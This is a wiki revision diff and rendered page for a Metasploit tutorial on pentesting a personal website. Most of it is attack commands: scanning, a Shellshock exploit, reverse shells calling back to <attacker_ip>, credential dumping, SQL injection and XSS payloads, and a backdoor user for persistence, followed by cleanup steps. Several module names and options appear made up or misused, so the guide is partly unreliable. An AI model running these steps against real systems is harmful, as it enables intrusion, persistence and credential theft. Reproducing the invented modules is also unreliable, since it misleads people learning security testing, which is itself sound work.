METASPLOIT - Pentest a Personnal Website: Difference between revisions
Created page with "Category:Wiki == Starting Metasploit == First, launch Metasploit's console to begin the penetration test: <nowiki> msfconsole </nowiki> == Information Gathering == Information gathering is the first phase of penetration testing, and Metasploit offers various auxiliary modules to gather valuable data about the target website. === Scanning for Open Ports === To find open ports on the target website's server, use the following auxiliary module: <nowiki> use auxilia..." |
m Text replacement - "Category:Wiki" to "Category:Wiki '''''[https://it-arts.net/index.php/Category:Wiki Return to Wiki Index]''''' " |
||
| (2 intermediate revisions by the same user not shown) | |||
| Line 1: | Line 1: | ||
[[Category:Wiki]] | [[Category:Wiki]] | ||
'''''[https://it-arts.net/index.php/Category:Wiki Return to Wiki Index]''''' | |||
== Starting Metasploit == | == Starting Metasploit == | ||
First, launch Metasploit's console to begin the penetration test: | First, launch Metasploit's console to begin the penetration test: | ||
<nowiki> | <nowiki> | ||
msfconsole | msfconsole | ||
</nowiki> | </nowiki> | ||
== Web Scanning for Vulnerabilities == | |||
To scan for web vulnerabilities such as SQL injection or XSS, you can use the following module: | To scan for web vulnerabilities such as SQL injection or XSS, you can use the following module: | ||
<nowiki> | <nowiki> | ||
use auxiliary/scanner/http/dir_scanner | use auxiliary/scanner/http/dir_scanner | ||
set RHOSTS <target_ip> | set RHOSTS <target_ip> | ||
| Line 46: | Line 27: | ||
Search for available exploits related to the website's technology stack: | Search for available exploits related to the website's technology stack: | ||
<nowiki> | <nowiki> | ||
search type:exploit <technology_or_vulnerability> | search type:exploit <technology_or_vulnerability> | ||
</nowiki> | </nowiki> | ||
| Line 53: | Line 34: | ||
If the target is running a vulnerable version of Apache or PHP, an exploit can be chosen and executed: | If the target is running a vulnerable version of Apache or PHP, an exploit can be chosen and executed: | ||
<nowiki> | <nowiki> | ||
use exploit/multi/http/apache_mod_cgi_bash_env_exec | use exploit/multi/http/apache_mod_cgi_bash_env_exec | ||
set RHOSTS <target_ip> | set RHOSTS <target_ip> | ||
| Line 66: | Line 47: | ||
After gaining access, you can use a reverse shell payload to establish persistent access: | After gaining access, you can use a reverse shell payload to establish persistent access: | ||
<nowiki> | <nowiki> | ||
use payload/linux/x86/shell_reverse_tcp | use payload/linux/x86/shell_reverse_tcp | ||
set LHOST <attacker_ip> | set LHOST <attacker_ip> | ||
| Line 77: | Line 58: | ||
To dump web application credentials, you can use Metasploit's post-exploitation modules: | To dump web application credentials, you can use Metasploit's post-exploitation modules: | ||
<nowiki> | <nowiki> | ||
use post/multi/gather/enum_web_app_users | use post/multi/gather/enum_web_app_users | ||
set RHOSTS <target_ip> | set RHOSTS <target_ip> | ||
| Line 89: | Line 70: | ||
For a site vulnerable to SQL injection, you can try the following: | For a site vulnerable to SQL injection, you can try the following: | ||
<nowiki> | <nowiki> | ||
use exploit/multi/http/phpmyadmin_sql_injection | use exploit/multi/http/phpmyadmin_sql_injection | ||
set RHOSTS <target_ip> | set RHOSTS <target_ip> | ||
| Line 100: | Line 81: | ||
For a site vulnerable to XSS, you can attempt an exploit like the following: | For a site vulnerable to XSS, you can attempt an exploit like the following: | ||
<nowiki> | <nowiki> | ||
use exploit/multi/http/xss | use exploit/multi/http/xss | ||
set RHOSTS <target_ip> | set RHOSTS <target_ip> | ||
| Line 114: | Line 95: | ||
You can add a backdoor user to maintain persistent access: | You can add a backdoor user to maintain persistent access: | ||
<nowiki> | <nowiki> | ||
use post/linux/manage/adduser | use post/linux/manage/adduser | ||
set RHOSTS <target_ip> | set RHOSTS <target_ip> | ||
| Line 125: | Line 106: | ||
Another method to maintain access is by setting up a reverse shell: | Another method to maintain access is by setting up a reverse shell: | ||
<nowiki> | <nowiki> | ||
use payload/linux/x86/shell_reverse_tcp | use payload/linux/x86/shell_reverse_tcp | ||
set LHOST <attacker_ip> | set LHOST <attacker_ip> | ||
| Line 139: | Line 120: | ||
To generate a simple HTML report: | To generate a simple HTML report: | ||
<nowiki> | <nowiki> | ||
spool /path/to/report.html | spool /path/to/report.html | ||
report | report | ||
| Line 151: | Line 132: | ||
If you added any backdoor users, remove them to ensure the system is no longer compromised: | If you added any backdoor users, remove them to ensure the system is no longer compromised: | ||
<nowiki> | <nowiki> | ||
use post/linux/manage/remove_user | use post/linux/manage/remove_user | ||
set RHOSTS <target_ip> | set RHOSTS <target_ip> | ||
| Line 161: | Line 142: | ||
If you created any reverse shell listeners or sessions, make sure to terminate them: | If you created any reverse shell listeners or sessions, make sure to terminate them: | ||
<nowiki> | <nowiki> | ||
sessions -K | sessions -K | ||
</nowiki> | </nowiki> | ||
Latest revision as of 08:04, 17 January 2026
Starting Metasploit
First, launch Metasploit's console to begin the penetration test:
msfconsole
Web Scanning for Vulnerabilities
To scan for web vulnerabilities such as SQL injection or XSS, you can use the following module:
use auxiliary/scanner/http/dir_scanner set RHOSTS <target_ip> set PATHS /admin /login /wp-login.php run
Exploiting Vulnerabilities
Once information gathering is complete, you can search for known exploits for the identified vulnerabilities.
Searching for Exploits
Search for available exploits related to the website's technology stack:
search type:exploit <technology_or_vulnerability>
Example of Exploit Execution
If the target is running a vulnerable version of Apache or PHP, an exploit can be chosen and executed:
use exploit/multi/http/apache_mod_cgi_bash_env_exec set RHOSTS <target_ip> set TARGETURI /cgi-bin/test.cgi run
Post-Exploitation
After successfully exploiting the target, post-exploitation helps in maintaining access and extracting more sensitive data.
Creating a Reverse Shell
After gaining access, you can use a reverse shell payload to establish persistent access:
use payload/linux/x86/shell_reverse_tcp set LHOST <attacker_ip> set LPORT 4444 set RHOSTS <target_ip> run
Dumping Web Server Credentials
To dump web application credentials, you can use Metasploit's post-exploitation modules:
use post/multi/gather/enum_web_app_users set RHOSTS <target_ip> run
Exploiting Web Application Vulnerabilities
If a web application vulnerability such as SQL Injection is discovered, you can use Metasploit's web application exploitation tools.
Using SQL Injection Exploits
For a site vulnerable to SQL injection, you can try the following:
use exploit/multi/http/phpmyadmin_sql_injection set RHOSTS <target_ip> set TARGETURI /phpmyadmin set SQL_PAYLOAD "1' OR 1=1--" run
Using Cross-Site Scripting (XSS) Exploit
For a site vulnerable to XSS, you can attempt an exploit like the following:
use exploit/multi/http/xss
set RHOSTS <target_ip>
set TARGETURI /search.php
set PAYLOAD "alert('XSS')"
run
Maintaining Access
Once you’ve exploited a vulnerability and have gained access to the system, maintaining access is critical for further testing.
Adding a Backdoor User
You can add a backdoor user to maintain persistent access:
use post/linux/manage/adduser set RHOSTS <target_ip> set USERNAME <username> set PASSWORD <password> run
Creating a Reverse Shell Payload
Another method to maintain access is by setting up a reverse shell:
use payload/linux/x86/shell_reverse_tcp set LHOST <attacker_ip> set LPORT 4444 set RHOSTS <target_ip> run
Reporting
Once the penetration test is complete, you can generate a detailed report of your findings, including all exploited vulnerabilities and actions taken.
Generating a Report
To generate a simple HTML report:
spool /path/to/report.html report spool off
Clean Up
After the penetration test, it's crucial to clean up any backdoors or other remnants left behind on the target system.
Remove Backdoor User
If you added any backdoor users, remove them to ensure the system is no longer compromised:
use post/linux/manage/remove_user set RHOSTS <target_ip> set USERNAME <username> run
Deleting Reverse Shells
If you created any reverse shell listeners or sessions, make sure to terminate them:
sessions -K
